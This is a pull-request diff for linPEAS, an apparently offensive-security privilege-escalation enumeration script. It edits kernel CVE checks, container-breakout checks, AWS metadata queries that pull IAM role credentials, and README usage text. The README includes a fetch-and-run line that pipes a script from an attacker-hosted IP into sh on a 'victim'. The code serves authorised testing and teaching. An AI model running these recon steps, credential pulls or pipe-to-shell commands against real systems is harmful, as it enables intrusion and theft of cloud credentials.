Merge pull request #329 from godylockz/master

Fix Internet Explorer Enumeration

.github/workflows/CI-master_tests.yml

@@ -1,10 +1,6 @@
 name: CI-master_test
 
 on:  
-  pull_request:
-    branches:
-      - master
-  
   schedule:
     - cron: "5 4 * * SUN"
 

build_lists/sensitive_files.yaml

@@ -413,7 +413,7 @@ search:
             exec:
             - 'echo "Apache version: $(warn_exec apache2 -v 2>/dev/null; warn_exec httpd -v 2>/dev/null)"'
             - 'echo "Nginx version: $(warn_exec nginx -v 2>/dev/null)"'
-            - if [ -d "/etc/apache2" ] && [ -r "/etc/apache2" ]; then 'grep -R -B1 "httpd-php" /etc/apache2 2>/dev/null'; fi
+            - if [ -d "/etc/apache2" ] && [ -r "/etc/apache2" ]; then grep -R -B1 "httpd-php" /etc/apache2 2>/dev/null; fi
             - if [ -d "/usr/share/nginx/modules" ] && [ -r "/usr/share/nginx/modules" ]; then print_3title 'Nginx modules'; ls /usr/share/nginx/modules | sed -${E} "s,$NGINX_KNOWN_MODULES,${SED_GREEN},g"; fi
             - "print_3title 'PHP exec extensions'"
             
@@ -442,11 +442,33 @@ search:
               value: 
                 bad_regex: "On"
                 remove_regex: "^;"
-                line_grep: '"allow_"'
+                line_grep: "allow_"
                 type: f
                 search_in: 
                     - common
             
+            - name: "nginx.conf"
+              value: 
+                bad_regex: "location.*.php$|$uri|$document_uri|proxy_intercept_errors.*on|proxy_hide_header.*|merge_slashes.*on|resolver.*|proxy_pass|internal|location.+[a-zA-Z0-9][^/]\\s+\\{|map|proxy_set_header.*Upgrade.*http_upgrade|proxy_set_header.*Connection.*http_connection"
+                remove_regex: "#"
+                type: f
+                remove_empty_lines: True
+                search_in: 
+                    - common
+            
+            - name: "nginx"
+              value: 
+                type: d
+                files:
+                    - name: "*.conf"
+                      value:
+                        bad_regex: "location.*.php$|$uri|$document_uri|proxy_intercept_errors.*on|proxy_hide_header.*|merge_slashes.*on|resolver.*|proxy_pass|internal|location.+[a-zA-Z0-9][^/]\\s+\\{|map|proxy_set_header.*Upgrade.*http_upgrade|proxy_set_header.*Connection.*http_connection"
+                        remove_empty_lines: True
+                        remove_regex: '#'
+                        remove_path: "nginx.conf"
+                search_in: 
+                    - common
+  
   - name: PHP Sessions
     value:
         config:

linPEAS/README.md

@@ -22,7 +22,7 @@ curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas
 
 ```bash
 # Local network
-sudo python -m SimpleHTTPServer 80 #Host
+sudo python -m http.server 80 #Host
 curl 10.10.10.10/linpeas.sh | sh #Victim
 
 # Without curl
@@ -47,6 +47,12 @@ chmod +x linpeas_linux_amd64
 ./linpeas_linux_amd64
 ```
 
+```bash
+# Execute from memory in Penelope session
+# From: https://github.com/brightio/penelope
+> run peass-ng
+```
+
 ## Firmware Analysis
 If you have a **firmware** and you want to **analyze it with linpeas** to **search for passwords or bad configured permissions** you have 2 main options.
 
@@ -106,25 +112,36 @@ This script has **several lists** included inside of it to be able to **color th
 ```
 Enumerate and search Privilege Escalation vectors.
 This tool enum and search possible misconfigurations (known vulns, user, processes and file permissions, special file permissions, readable/writable files, bruteforce other users(top1000pwds), passwords...) inside the host and highlight possible misconfigurations with colors.
-      -h To show this message
+        Checks:
-      -q Do not show banner
+            -o Only execute selected checks (system_information,container,cloud,procs_crons_timers_srvcs_sockets,network_information,users_information,software_information,interesting_files,api_keys_regex). Select a comma separated list.
+            -s Stealth & faster (don't check some time consuming checks)
             -e Perform extra enumeration
-      -s SuperFast (don't check some time consuming checks) - Stealth mode
+            -t Automatic network scan & Internet conectivity checks - This option writes to files
-      -a All checks except regexes - Noisy mode, for CTFs mainly
+            -r Enable Regexes (this can take from some mins to hours)
-      -r Activate Regexes (this can take from some mins to several hours)
-      -f </FOLDER/PATH> Execute linpeas to search passwords/file permissions misconfigs inside a folder
-      -w Wait execution between big blocks of checks
-      -N Do not use colours
-      -D Debug mode
             -P Indicate a password that will be used to run 'sudo -l' and to bruteforce other users accounts via 'su'
-      -o Only execute selected checks (system_information,container,procs_crons_timers_srvcs_sockets,network_information,users_information,software_information,interesting_files,api_keys_regex). Select a comma separated list.
+	    -D Debug mode
-      -L Force linpeas execution.
+
-      -M Force macpeas execution.
+        Network recon:
+            -t Automatic network scan & Internet conectivity checks - This option writes to files
 	    -d <IP/NETMASK> Discover hosts using fping or ping. Ex: -d 192.168.0.1/24
             -p <PORT(s)> -d <IP/NETMASK> Discover hosts looking for TCP open ports (via nc). By default ports 22,80,443,445,3389 and another one indicated by you will be scanned (select 22 if you don't want to add more). You can also add a list of ports. Ex: -d 192.168.0.1/24 -p 53,139
             -i <IP> [-p <PORT(s)>] Scan an IP using nc. By default (no -p), top1000 of nmap will be scanned, but you can select a list of ports instead. Ex: -i 127.0.0.1 -p 53,80,443,8000,8080
-      -t Automatic network scan (host discovery and port scanning) - This option writes to files
              Notice that if you specify some network scan (options -d/-p/-i but NOT -t), no PE check will be performed
+
+        Port forwarding:
+            -F LOCAL_IP:LOCAL_PORT:REMOTE_IP:REMOTE_PORT Execute linpeas to forward a port from a local IP to a remote IP
+
+        Firmware recon:
+            -f </FOLDER/PATH> Execute linpeas to search passwords/file permissions misconfigs inside a folder
+
+        Misc:
+            -h To show this message
+	    -w Wait execution between big blocks of checks
+            -L Force linpeas execution
+            -M Force macpeas execution
+	    -q Do not show banner
+            -N Do not use colours
+
 ```
 
 ## Hosts Discovery and Port Scanning

linPEAS/builder/linpeas_parts/1_system_information.sh

@@ -25,7 +25,7 @@ echo ""
 print_2title "CVEs Check"
 
 #-- SY) CVE-2021-4034
-if [ `command -v pkexec` ] && stat -c '%a' $(which pkexec) | grep -q 4755 && [ "$(stat -c '%Y' $(which pkexec))" -lt "1642035600" ]; then 
+if [ `command -v pkexec` ] && stat -c '%a' $(which pkexec) | grep -q 4755 && [ "$(stat -c '%Y' $(which pkexec))" -lt "1641942000" ]; then 
     echo "Vulnerable to CVE-2021-4034" | sed -${E} "s,.*,${SED_RED_YELLOW},"
     echo ""
 fi
@@ -42,8 +42,17 @@ fi
 #-- https://stackoverflow.com/a/37939589
 kernelversion=$(uname -r | awk -F"-" '{print $1}')
 kernelnumber=$(echo $kernelversion | awk -F. '{ printf("%d%03d%03d%03d\n", $1,$2,$3,$4); }')
-if [ $kernelnumber -ge 5008000000 ] && [ $kernelnumber -lt 5017000000 ]; then # if kernel version beteen 5.8 and 5.17
+if [ $kernelnumber -ge 5008000000 ] && [ $kernelnumber -lt 5017000000 ]; then # if kernel version between 5.8 and 5.17
-    echo "Vulnerable to CVE-2022-0847" | sed -${E} "s,.*,${SED_RED_YELLOW},"
+    echo "Potentially Vulnerable to CVE-2022-0847" | sed -${E} "s,.*,${SED_RED},"
+    echo ""
+fi
+
+#-- SY) CVE-2022-2588
+#-- https://github.com/Markakd/CVE-2022-2588
+kernelversion=$(uname -r | awk -F"-" '{print $1}')
+kernelnumber=$(echo $kernelversion | awk -F. '{ printf("%d%03d%03d%03d\n", $1,$2,$3,$4); }')
+if [ $kernelnumber -ge 3017000000 ] && [ $kernelnumber -lt 5019000000 ]; then # if kernel version between 3.17 and 5.19
+    echo "Potentially Vulnerable to CVE-2022-2588" | sed -${E} "s,.*,${SED_RED},"
     echo ""
 fi
 echo ""
@@ -162,7 +171,7 @@ if [ "$(command -v perl 2>/dev/null)" ]; then
     print_2title "Executing Linux Exploit Suggester 2"
     print_info "https://github.com/jondonas/linux-exploit-suggester-2"
     les2_b64="peass{LES2}"
-    echo $les2_b64 | base64 -d | perl | sed "s,$(printf '\033')\\[[0-9;]*[a-zA-Z],,g" | grep -i "CVE" -B 1 -A 10 | grep -Ev "^\-\-$" | sed -${E} "s,CVE-[0-9]+-[0-9]+,${SED_RED},g"
+    echo $les2_b64 | base64 -d | perl 2>/dev/null | sed "s,$(printf '\033')\\[[0-9;]*[a-zA-Z],,g" | grep -i "CVE" -B 1 -A 10 | grep -Ev "^\-\-$" | sed -${E} "s,CVE-[0-9]+-[0-9]+,${SED_RED},g"
     echo ""
 fi
 

linPEAS/builder/linpeas_parts/2_container.sh

@@ -77,7 +77,7 @@ enumerateDockerSockets() {
   dockerVersion="$(echo_not_found)"
   if ! [ "$SEARCHED_DOCKER_SOCKETS" ]; then
     SEARCHED_DOCKER_SOCKETS="1"
-    for int_sock in $(find / ! -path "/sys/*" -type s -name "docker.sock" -o -name "docker.socket" -o -name "dockershim.sock" -n -name "containerd.sock" -o -name "crio.sock" -o -name "frakti.sock" -o -name "rktlet.sock" 2>/dev/null); do
+    for int_sock in $(find / ! -path "/sys/*" -type s -name "docker.sock" -o -name "docker.socket" -o -name "dockershim.sock" -o -name "containerd.sock" -o -name "crio.sock" -o -name "frakti.sock" -o -name "rktlet.sock" 2>/dev/null); do
       if ! [ "$IAMROOT" ] && [ -w "$int_sock" ]; then
         if echo "$int_sock" | grep -Eq "docker"; then
           dock_sock="$int_sock"
@@ -285,26 +285,26 @@ if [ "$inContainer" ]; then
     print_list "uevent_helper breakout ......... $uevent_helper_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
     print_list "core_pattern breakout .......... $core_pattern_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
     print_list "is modprobe present ............ $modprobe_present\n" | sed -${E} "s,/.*,${SED_RED},"
-    print_list "DoS via panic_on_oom ........... $panic_on_oom_dos\n"
+    print_list "DoS via panic_on_oom ........... $panic_on_oom_dos\n" | sed -${E} "s,/Yes,${SED_RED},"
-    print_list "DoS via panic_sys_fs ........... $panic_sys_fs_dos\n"
+    print_list "DoS via panic_sys_fs ........... $panic_sys_fs_dos\n" | sed -${E} "s,/Yes,${SED_RED},"
-    print_list "DoS via sysreq_trigger_dos ..... $sysreq_trigger_dos\n"
+    print_list "DoS via sysreq_trigger_dos ..... $sysreq_trigger_dos\n" | sed -${E} "s,/Yes,${SED_RED},"
-    print_list "/proc/config.gz readable ....... $proc_configgz_readable\n"
+    print_list "/proc/config.gz readable ....... $proc_configgz_readable\n" | sed -${E} "s,/Yes,${SED_RED},"
-    print_list "/proc/sched_debug readable ..... $sched_debug_readable\n"
+    print_list "/proc/sched_debug readable ..... $sched_debug_readable\n" | sed -${E} "s,/Yes,${SED_RED},"
-    print_list "/proc/*/mountinfo readable ..... $mountinfo_readable\n"
+    print_list "/proc/*/mountinfo readable ..... $mountinfo_readable\n" | sed -${E} "s,/Yes,${SED_RED},"
-    print_list "/sys/kernel/security present ... $security_present\n"
+    print_list "/sys/kernel/security present ... $security_present\n" | sed -${E} "s,/Yes,${SED_RED},"
-    print_list "/sys/kernel/security writable .. $security_writable\n"
+    print_list "/sys/kernel/security writable .. $security_writable\n" | sed -${E} "s,/Yes,${SED_RED},"
     if [ "$EXTRA_CHECKS" ]; then
-      print_list "/proc/kmsg readable ............ $kmsg_readable\n"
+      print_list "/proc/kmsg readable ............ $kmsg_readable\n" | sed -${E} "s,/Yes,${SED_RED},"
-      print_list "/proc/kallsyms readable ........ $kallsyms_readable\n"
+      print_list "/proc/kallsyms readable ........ $kallsyms_readable\n" | sed -${E} "s,/Yes,${SED_RED},"
-      print_list "/proc/self/mem readable ........ $sched_debug_readable\n"
+      print_list "/proc/self/mem readable ........ $sched_debug_readable\n" | sed -${E} "s,/Yes,${SED_RED},"
-      print_list "/proc/kcore readable ........... $kcore_readable\n"
+      print_list "/proc/kcore readable ........... $kcore_readable\n" | sed -${E} "s,/Yes,${SED_RED},"
-      print_list "/proc/kmem readable ............ $kmem_readable\n"
+      print_list "/proc/kmem readable ............ $kmem_readable\n" | sed -${E} "s,/Yes,${SED_RED},"
-      print_list "/proc/kmem writable ............ $kmem_writable\n"
+      print_list "/proc/kmem writable ............ $kmem_writable\n" | sed -${E} "s,/Yes,${SED_RED},"
-      print_list "/proc/mem readable ............. $mem_readable\n"
+      print_list "/proc/mem readable ............. $mem_readable\n" | sed -${E} "s,/Yes,${SED_RED},"
-      print_list "/proc/mem writable ............. $mem_writable\n"
+      print_list "/proc/mem writable ............. $mem_writable\n" | sed -${E} "s,/Yes,${SED_RED},"
-      print_list "/sys/kernel/vmcoreinfo readable  $vmcoreinfo_readable\n"
+      print_list "/sys/kernel/vmcoreinfo readable  $vmcoreinfo_readable\n" | sed -${E} "s,/Yes,${SED_RED},"
-      print_list "/sys/firmware/efi/vars writable  $efi_vars_writable\n"
+      print_list "/sys/firmware/efi/vars writable  $efi_vars_writable\n" | sed -${E} "s,/Yes,${SED_RED},"
-      print_list "/sys/firmware/efi/efivars writable $efi_efivars_writable\n"
+      print_list "/sys/firmware/efi/efivars writable $efi_efivars_writable\n" | sed -${E} "s,/Yes,${SED_RED},"
     fi
     
     echo ""

linPEAS/builder/linpeas_parts/3_cloud.sh

@@ -187,11 +187,11 @@ if [ "$is_aws_ecs" = "Yes" ]; then
 
     if [ "$aws_ecs_metadata_uri" ]; then
         print_3title "Container Info"
-        exec_with_jq $aws_ecs_req "$aws_ecs_metadata_uri"
+        exec_with_jq eval $aws_ecs_req "$aws_ecs_metadata_uri"
         echo ""
         
         print_3title "Task Info"
-        exec_with_jq $aws_ecs_req "$aws_ecs_metadata_uri/task"
+        exec_with_jq eval $aws_ecs_req "$aws_ecs_metadata_uri/task"
         echo ""
     else
         echo "I couldn't find ECS_CONTAINER_METADATA_URI env var to get container info"
@@ -199,7 +199,7 @@ if [ "$is_aws_ecs" = "Yes" ]; then
 
     if [ "$aws_ecs_service_account_uri" ]; then
         print_3title "IAM Role"
-        exec_with_jq $aws_ecs_req "$aws_ecs_service_account_uri"
+        exec_with_jq eval $aws_ecs_req "$aws_ecs_service_account_uri"
         echo ""
     else
         echo "I couldn't find AWS_CONTAINER_CREDENTIALS_RELATIVE_URI env var to get IAM role info (the task is running without a task role probably)"
@@ -214,52 +214,52 @@ if [ "$is_aws_ec2" = "Yes" ]; then
     
     aws_req=""
     if [ "$(command -v curl)" ]; then
-        aws_req='curl -s -f -H "$HEADER"'
+        aws_req="curl -s -f -H '$HEADER'"
     elif [ "$(command -v wget)" ]; then
-        aws_req='wget -q -O - -H "$HEADER"'
+        aws_req="wget -q -O - -H '$HEADER'"
     else 
         echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
     fi
   
     if [ "$aws_req" ]; then
-        printf "ami-id: "; $aws_req "$URL/ami-id"; echo ""
+        printf "ami-id: "; eval $aws_req "$URL/ami-id"; echo ""
-        printf "instance-action: "; $aws_req "$URL/instance-action"; echo ""
+        printf "instance-action: "; eval $aws_req "$URL/instance-action"; echo ""
-        printf "instance-id: "; $aws_req "$URL/instance-id"; echo ""
+        printf "instance-id: "; eval $aws_req "$URL/instance-id"; echo ""
-        printf "instance-life-cycle: "; $aws_req "$URL/instance-life-cycle"; echo ""
+        printf "instance-life-cycle: "; eval $aws_req "$URL/instance-life-cycle"; echo ""
-        printf "instance-type: "; $aws_req "$URL/instance-type"; echo ""
+        printf "instance-type: "; eval $aws_req "$URL/instance-type"; echo ""
-        printf "region: "; $aws_req "$URL/placement/region"; echo ""
+        printf "region: "; eval $aws_req "$URL/placement/region"; echo ""
 
         echo ""
         print_3title "Account Info"
-        exec_with_jq $aws_req "$URL/identity-credentials/ec2/info"; echo ""
+        exec_with_jq eval $aws_req "$URL/identity-credentials/ec2/info"; echo ""
 
         echo ""
         print_3title "Network Info"
-        for mac in $($aws_req "$URL/network/interfaces/macs/" 2>/dev/null); do 
+        for mac in $(eval $aws_req "$URL/network/interfaces/macs/" 2>/dev/null); do 
           echo "Mac: $mac"
-          printf "Owner ID: "; $aws_req "$URL/network/interfaces/macs/$mac/owner-id"; echo ""
+          printf "Owner ID: "; eval $aws_req "$URL/network/interfaces/macs/$mac/owner-id"; echo ""
-          printf "Public Hostname: "; $aws_req "$URL/network/interfaces/macs/$mac/public-hostname"; echo ""
+          printf "Public Hostname: "; eval $aws_req "$URL/network/interfaces/macs/$mac/public-hostname"; echo ""
-          printf "Security Groups: "; $aws_req "$URL/network/interfaces/macs/$mac/security-groups"; echo ""
+          printf "Security Groups: "; eval $aws_req "$URL/network/interfaces/macs/$mac/security-groups"; echo ""
-          echo "Private IPv4s:"; $aws_req "$URL/network/interfaces/macs/$mac/ipv4-associations/"; echo ""
+          echo "Private IPv4s:"; eval $aws_req "$URL/network/interfaces/macs/$mac/ipv4-associations/"; echo ""
-          printf "Subnet IPv4: "; $aws_req "$URL/network/interfaces/macs/$mac/subnet-ipv4-cidr-block"; echo ""
+          printf "Subnet IPv4: "; eval $aws_req "$URL/network/interfaces/macs/$mac/subnet-ipv4-cidr-block"; echo ""
-          echo "PrivateIPv6s:"; $aws_req "$URL/network/interfaces/macs/$mac/ipv6s"; echo ""
+          echo "PrivateIPv6s:"; eval $aws_req "$URL/network/interfaces/macs/$mac/ipv6s"; echo ""
-          printf "Subnet IPv6: "; $aws_req "$URL/network/interfaces/macs/$mac/subnet-ipv6-cidr-blocks"; echo ""
+          printf "Subnet IPv6: "; eval $aws_req "$URL/network/interfaces/macs/$mac/subnet-ipv6-cidr-blocks"; echo ""
-          echo "Public IPv4s:"; $aws_req "$URL/network/interfaces/macs/$mac/public-ipv4s"; echo ""
+          echo "Public IPv4s:"; eval $aws_req "$URL/network/interfaces/macs/$mac/public-ipv4s"; echo ""
           echo ""
         done
 
         echo ""
         print_3title "IAM Role"
-        exec_with_jq $aws_req "$URL/iam/info"; echo ""
+        exec_with_jq eval $aws_req "$URL/iam/info"; echo ""
-        for role in $($aws_req "$URL/iam/security-credentials/" 2>/dev/null); do 
+        for role in $(eval $aws_req "$URL/iam/security-credentials/" 2>/dev/null); do 
           echo "Role: $role"
-          exec_with_jq $aws_req "$URL/iam/security-credentials/$role"; echo ""
+          exec_with_jq eval $aws_req "$URL/iam/security-credentials/$role"; echo ""
           echo ""
         done
         
         echo ""
         print_3title "User Data"
-        $aws_req "http://169.254.169.254/latest/user-data"
+        eval $aws_req "http://169.254.169.254/latest/user-data"
     fi
 fi
 

linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets.sh

@@ -3,6 +3,7 @@
 #-----) Processes & Cron & Services & Timers (-----#
 ####################################################
 
+if ! [ "$SEARCH_IN_FOLDER" ]; then
   #-- PCS) Cleaned proccesses
   print_2title "Cleaned processes"
   if [ "$NOUSEPS" ]; then
@@ -39,7 +40,9 @@ else
     ps auxwww 2>/dev/null | awk '{print $11}' | xargs ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null | grep -v " root root " | grep -v " $USER " | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$binW,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," | sed "s,root,${SED_GREEN},"
   fi
   echo ""
+fi
 
+if ! [ "$SEARCH_IN_FOLDER" ]; then
   #-- PCS) Files opened by processes belonging to other users
   if ! [ "$IAMROOT" ]; then
     print_2title "Files opened by processes belonging to other users"
@@ -47,7 +50,9 @@ if ! [ "$IAMROOT" ]; then
     lsof 2>/dev/null | grep -v "$USER" | grep -iv "permission denied" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED},"
     echo ""
   fi
+fi
 
+if ! [ "$SEARCH_IN_FOLDER" ]; then
   #-- PCS) Processes with credentials inside memory
   print_2title "Processes with credentials in memory (root req)"
   print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#credentials-from-process-memory"
@@ -58,7 +63,9 @@ if echo "$pslist" | grep -q "vsftpd"; then echo "vsftpd process found (dump cred
   if echo "$pslist" | grep -q "apache2"; then echo "apache2 process found (dump creds from memory as root)" | sed "s,apache2,${SED_RED},"; else echo_not_found "apache2"; fi
   if echo "$pslist" | grep -q "sshd:"; then echo "sshd: process found (dump creds from memory as root)" | sed "s,sshd:,${SED_RED},"; else echo_not_found "sshd"; fi
   echo ""
+fi
 
+if ! [ "$SEARCH_IN_FOLDER" ]; then
   #-- PCS) Different processes 1 min
   if ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then
     print_2title "Different processes executed during 1 min (interesting is low number of repetitions)"
@@ -67,7 +74,9 @@ if ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then
     if [ "$(ps -e -o command 2>/dev/null)" ]; then for i in $(seq 1 1250); do ps -e -o command >> "$temp_file" 2>/dev/null; sleep 0.05; done; sort "$temp_file" 2>/dev/null | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort -r -n | grep -E -v "\s*[1-9][0-9][0-9][0-9]"; rm "$temp_file"; fi
     echo ""
   fi
+fi
 
+if ! [ "$SEARCH_IN_FOLDER" ]; then
   #-- PCS) Cron
   print_2title "Cron jobs"
   print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs"
@@ -80,8 +89,15 @@ cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/* /etc/incron.d
   crontab -l -u "$USER" 2>/dev/null | tr -d "\r"
   ls -lR /usr/lib/cron/tabs/ /private/var/at/jobs /var/at/tabs/ /etc/periodic/ 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g" #MacOS paths
   atq 2>/dev/null
+else
+  print_2title "Cron jobs"
+  print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs"
+  find "$SEARCH_IN_FOLDER" '(' -type d -or -type f ')' '(' -name "cron*" -or -name "anacron" -or -name "anacrontab" -or -name "incron.d" -or -name "incron" -or -name "at" -or -name "periodic" ')' -exec echo {} \; -exec ls -lR {} \;
+fi
 echo ""
 
+
+if ! [ "$SEARCH_IN_FOLDER" ]; then
   if [ "$MACPEAS" ]; then
     print_2title "Third party LaunchAgents & LaunchDemons"
     print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#launchd"
@@ -120,7 +136,9 @@ if [ "$MACPEAS" ]; then
     ls -l /private/var/db/emondClients
     echo ""
   fi
+fi
 
+if ! [ "$SEARCH_IN_FOLDER" ]; then
   #-- PCS) Services
   if [ "$EXTRA_CHECKS" ]; then
     print_2title "Services"
@@ -128,21 +146,24 @@ if [ "$EXTRA_CHECKS" ]; then
     (service --status-all || service -e || chkconfig --list || rc-status || launchctl list) 2>/dev/null || echo_not_found "service|chkconfig|rc-status|launchctl"
     echo ""
   fi
+fi
 
+if ! [ "$SEARCH_IN_FOLDER" ]; then
   #-- PSC) systemd PATH
   print_2title "Systemd PATH"
   print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#systemd-path-relative-paths"
   systemctl show-environment 2>/dev/null | grep "PATH" | sed -${E} "s,$Wfolders\|\./\|\.:\|:\.,${SED_RED_YELLOW},g"
   WRITABLESYSTEMDPATH=$(systemctl show-environment 2>/dev/null | grep "PATH" | grep -E "$Wfolders")
   echo ""
+fi
 
 #-- PSC) .service files
 #TODO: .service files in MACOS are folders
 print_2title "Analyzing .service files"
 print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#services"
 printf "%s\n" "$PSTORAGE_SYSTEMD" | while read s; do
-  if [ ! -O "$s" ]; then #Remove services that belongs to the current user
+  if [ ! -O "$s" ] || [ "$SEARCH_IN_FOLDER" ]; then #Remove services that belongs to the current user or if firmware see everything
-    if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ]; then
+    if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ] && ! [ "$SEARCH_IN_FOLDER" ]; then
       echo "$s" | sed -${E} "s,.*,${SED_RED_YELLOW},g"
     fi
     servicebinpaths=$(grep -Eo '^Exec.*?=[!@+-]*[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') #Get invoked paths
@@ -165,17 +186,19 @@ done
 if [ ! "$WRITABLESYSTEMDPATH" ]; then echo "You can't write on systemd PATH" | sed -${E} "s,.*,${SED_GREEN},"; fi
 echo ""
 
+if ! [ "$SEARCH_IN_FOLDER" ]; then
   #-- PSC) Timers
   print_2title "System timers"
   print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers"
   (systemctl list-timers --all 2>/dev/null | grep -Ev "(^$|timers listed)" | sed -${E} "s,$timersG,${SED_GREEN},") || echo_not_found
   echo ""
+fi
 
 #-- PSC) .timer files
 print_2title "Analyzing .timer files"
 print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers"
 printf "%s\n" "$PSTORAGE_TIMER" | while read t; do
-  if ! [ "$IAMROOT" ] && [ -w "$t" ]; then
+  if ! [ "$IAMROOT" ] && [ -w "$t" ] && ! [ "$SEARCH_IN_FOLDER" ]; then
     echo "$t" | sed -${E} "s,.*,${SED_RED},g"
   fi
   timerbinpaths=$(grep -Po '^Unit=*(.*?$)' $t 2>/dev/null | cut -d '=' -f2)
@@ -197,7 +220,7 @@ if ! [ "$IAMROOT" ]; then
   print_2title "Analyzing .socket files"
   print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets"
   printf "%s\n" "$PSTORAGE_SOCKET" | while read s; do
-    if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ]; then
+    if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ] && ! [ "$SEARCH_IN_FOLDER" ]; then
       echo "Writable .socket file: $s" | sed "s,/.*,${SED_RED},g"
     fi
     socketsbinpaths=$(grep -Eo '^(Exec).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,')
@@ -215,6 +238,7 @@ if ! [ "$IAMROOT" ]; then
   done
   echo ""
   
+  if ! [ "$SEARCH_IN_FOLDER" ]; then
     print_2title "Unix Sockets Listening"
     print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets"
     # Search sockets using netstat and ss
@@ -225,9 +249,14 @@ if ! [ "$IAMROOT" ]; then
     if ! [ "$unix_scks_list" ];then
       unix_scks_list=$(netstat -a -p --unix 2>/dev/null | grep -Ei "listen|PID" | grep -Eo "/[a-zA-Z0-9\._/\-]+" | tail -n +2)
     fi
+  fi
   
+  if ! [ "$SEARCH_IN_FOLDER" ]; then
     # But also search socket files
     unix_scks_list2=$(find / -type s 2>/dev/null)
+  else
+    unix_scks_list2=$(find "SEARCH_IN_FOLDER" -type s 2>/dev/null)
+  fi
 
   # Detele repeated dockets and check permissions
   (printf "%s\n" "$unix_scks_list" && printf "%s\n" "$unix_scks_list2") | sort | uniq | while read l; do
@@ -238,10 +267,20 @@ if ! [ "$IAMROOT" ]; then
     if [ -w "$l" ];then
       perms="${perms}Write"
     fi
+    
+    if [ "$EXTRA_CHECKS" ] && [ "$(command -v curl)" ]; then
+      CANNOT_CONNECT_TO_SOCKET="$(curl -v --unix-socket "$l" --max-time 1 http:/linpeas 2>&1 | grep -i 'Permission denied')"
+      if ! [ "$CANNOT_CONNECT_TO_SOCKET" ]; then
+        perms="${perms} - Can Connect"
+      else
+        perms="${perms} - Cannot Connect"
+      fi
+    fi
+    
     if ! [ "$perms" ]; then echo "$l" | sed -${E} "s,$l,${SED_GREEN},g";
     else 
       echo "$l" | sed -${E} "s,$l,${SED_RED},g"
-      echo "  └─(${RED}${perms}${NC})"
+      echo "  └─(${RED}${perms}${NC})" | sed -${E} "s,Cannot Connect,${SED_GREEN},g"
       # Try to contact the socket
       socketcurl=$(curl --max-time 2 --unix-socket "$s" http:/index 2>/dev/null)
       if [ $? -eq 0 ]; then
@@ -260,7 +299,7 @@ print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-b
 if [ "$PSTORAGE_DBUS" ]; then
   printf "%s\n" "$PSTORAGE_DBUS" | while read d; do
     for f in $d/*; do
-      if ! [ "$IAMROOT" ] && [ -w "$f" ]; then
+      if ! [ "$IAMROOT" ] && [ -w "$f" ] && ! [ "$SEARCH_IN_FOLDER" ]; then
         echo "Writable $f" | sed -${E} "s,.*,${SED_RED},g"
       fi
 
@@ -282,6 +321,7 @@ if [ "$PSTORAGE_DBUS" ]; then
 fi
 echo ""
 
+if ! [ "$SEARCH_IN_FOLDER" ]; then
   print_2title "D-Bus Service Objects list"
   print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus"
   dbuslist=$(busctl list 2>/dev/null)
@@ -298,3 +338,4 @@ if [ "$dbuslist" ]; then
     done
   else echo_not_found "busctl"
   fi
+fi

linPEAS/builder/linpeas_parts/5_network_information.sh

@@ -155,6 +155,10 @@ if [ "$AUTO_NETWORK_SCAN" ]; then
         echo ""
       fi
     done
+    
+    print_3title "Scanning top ports of host.docker.internal"
+    (tcp_port_scan "host.docker.internal" "" | grep -A 1000 "Ports going to be scanned" | grep -v "Ports going to be scanned" | sort | uniq) 2>/dev/null
+    echo ""
   fi
 fi
 

linPEAS/builder/linpeas_parts/6_users_information.sh

@@ -105,7 +105,7 @@ fi
 echo ""
 
 #-- UI) Doas
-if [ -f "/etc/doas.conf" ] || [ "$DEBUG" ]; then
+if [ "$(command -v doas 2>/dev/null)" ] || [ "$DEBUG" ]; then
   print_2title "Checking doas.conf"
   doas_dir_name=$(dirname "$(command -v doas)" 2>/dev/null)
   if [ "$(cat /etc/doas.conf $doas_dir_name/doas.conf $doas_dir_name/../etc/doas.conf $doas_dir_name/etc/doas.conf 2>/dev/null)" ]; then 

linPEAS/builder/linpeas_parts/7_software_information.sh

@@ -5,14 +5,14 @@
